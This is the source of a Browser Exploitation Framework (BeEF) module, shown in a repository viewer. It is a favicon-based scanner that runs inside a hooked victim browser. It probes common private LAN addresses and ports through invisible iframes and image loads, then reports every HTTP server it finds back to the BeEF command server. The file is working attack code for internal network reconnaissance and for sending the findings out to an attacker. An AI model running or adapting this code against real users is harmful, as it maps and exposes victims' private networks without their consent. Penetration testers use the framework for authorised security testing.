Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/network/get_http_servers/command.js
1872 views
1
//

2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
  var ips     = "<%= @rhosts %>";

10
  var ports   = "<%= @ports %>";

11
  var timeout = parseInt("<%= @timeout %>", 10)*1000;

12
  var wait    = parseInt("<%= @wait %>", 10)*1000;

13
  var threads = parseInt("<%= @threads %>", 10);

14
  var urls    = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');

15


16
  if(beef.browser.isO()) {

17
    beef.debug("[Favicon Scanner] Browser is not supported.");

18
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error());

19
    return;

20
  }

21


22
  var sort_unique = function (arr) {

23
    arr = arr.sort(function (a, b) { return a*1 - b*1; });

24
    var ret = [arr[0]];

25
    for (var i = 1; i < arr.length; i++) {

26
        if (arr[i-1] !== arr[i]) {

27
            ret.push(arr[i]);

28
        }

29
    }

30
    return ret;

31
  }

32


33
  // set target ports

34
  ports = ports.split(',');

35
  var target_ports = new Array();

36
  for (var i=0; i<ports.length; i++) {

37
    var p = ports[i].replace(/(^\s+|\s+$)/g, '');

38
    if (beef.net.is_valid_port(p)) target_ports.push(p);

39
  }

40
  ports = sort_unique(target_ports);

41
  if (ports.length == 0) {

42
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no ports specified", beef.are.status_error());

43
    return;

44
  }

45


46
  // set target IP addresses

47
  if (ips == 'common') {

48
    ips = [

49
      '192.168.0.1',

50
      '192.168.0.100',

51
      '192.168.0.254',

52
      '192.168.1.1',

53
      '192.168.1.100',

54
      '192.168.1.254',

55
      '10.0.0.1',

56
      '10.1.1.1',

57
      '192.168.2.1',

58
      '192.168.2.254',

59
      '192.168.100.1',

60
      '192.168.100.254',

61
      '192.168.123.1',

62
      '192.168.123.254',

63
      '192.168.10.1',

64
      '192.168.10.254' ];

65
  } else {

66
    ips = ips.split(',');

67
    var target_ips = new Array();

68
    for (var i=0; i<ips.length; i++) {

69
      var ip = ips[i].replace(/(^\s+|\s+$)/g, '');

70
      if (beef.net.is_valid_ip(ip)) target_ips.push(ip);

71
      else if (beef.net.is_valid_ip_range(ip)) {

72
        ipBounds   = ip.split('-');

73
        lowerBound = ipBounds[0].split('.')[3];

74
        upperBound = ipBounds[1].split('.')[3];

75
        for (var i = lowerBound; i <= upperBound; i++) {

76
          target_ips.push(ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i);

77
        }

78
      }

79
    }

80
    ips = sort_unique(target_ips);

81
    if (ips.length == 0) {

82
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed target IP address(es) supplied", beef.are.status_error());

83
        return;

84
    }

85
  }

86


87
  // request the specified paths from the specified URL

88
  // and report all live URLs back to BeEF

89
  checkFavicon = function(proto, ip, port, uri) {

90
    var img = new Image;

91
    var dom = beef.dom.createInvisibleIframe();

92
    beef.debug("[Favicon Scanner] Checking IP [" + ip + "] (" + proto + ")");

93
    img.src = proto+"://"+ip+":"+port+uri;

94
    img.onerror = function() { dom.removeChild(this); }

95
    img.onload = function() {

96
      beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src), beef.are.status_success());dom.removeChild(this);

97
      beef.debug("[Favicon Scanner] Found HTTP Server [" + escape(this.src) + "]");

98
    }

99
    dom.appendChild(img);

100
    // stop & remove iframe

101
    setTimeout(function() {

102
      if (dom.contentWindow.stop !== undefined) {

103
        dom.contentWindow.stop();

104
      } else if (dom.contentWindow.document.execCommand !== undefined) {

105
        dom.contentWindow.document.execCommand("Stop", false);

106
      }

107
      document.body.removeChild(dom);

108
    }, timeout);

109
  }

110


111
  // configure workers

112
  WorkerQueue = function(id, frequency) {

113
    var stack = [];

114
    var timer = null;

115
    var frequency = frequency;

116
    var start_scan = (new Date).getTime();

117
    this.process = function() {

118
      var item = stack.shift();

119
      eval(item);

120
      if (stack.length === 0) {

121
        clearInterval(timer);

122
        timer = null;

123
        var interval = (new Date).getTime() - start_scan;

124
        beef.debug("[Favicon Scanner] Worker #"+id+" has finished ["+interval+" ms]");

125
        return;

126
      }

127
    }

128
    this.queue = function(item) {

129
      stack.push(item);

130
      if (timer === null) timer = setInterval(this.process, frequency);

131
    }

132
  }

133


134
  // create workers

135
  var workers = new Array();

136
  for (var id = 0; id < threads; id++) workers.push(new WorkerQueue(id, wait));

137


138
  // for each favicon path:

139
  for (var u=0; u < urls.length; u++) {

140
    var worker = workers[u % threads];

141
    // for each LAN IP address:

142
    for (var i=0; i < ips.length; i++) {

143
      // for each port:

144
      for (var p=0; p < ports.length; p++) {

145
        var host = ips[i];

146
        var port = ports[p];

147
        if (port == '443') var proto = 'https'; else var proto = 'http';

148
        // add URL to worker queue

149
        worker.queue('checkFavicon("'+proto+'","'+host+'","'+port+'","'+urls[u]+'");');

150
      }

151
    }

152
  }

153


154
});

155


156


157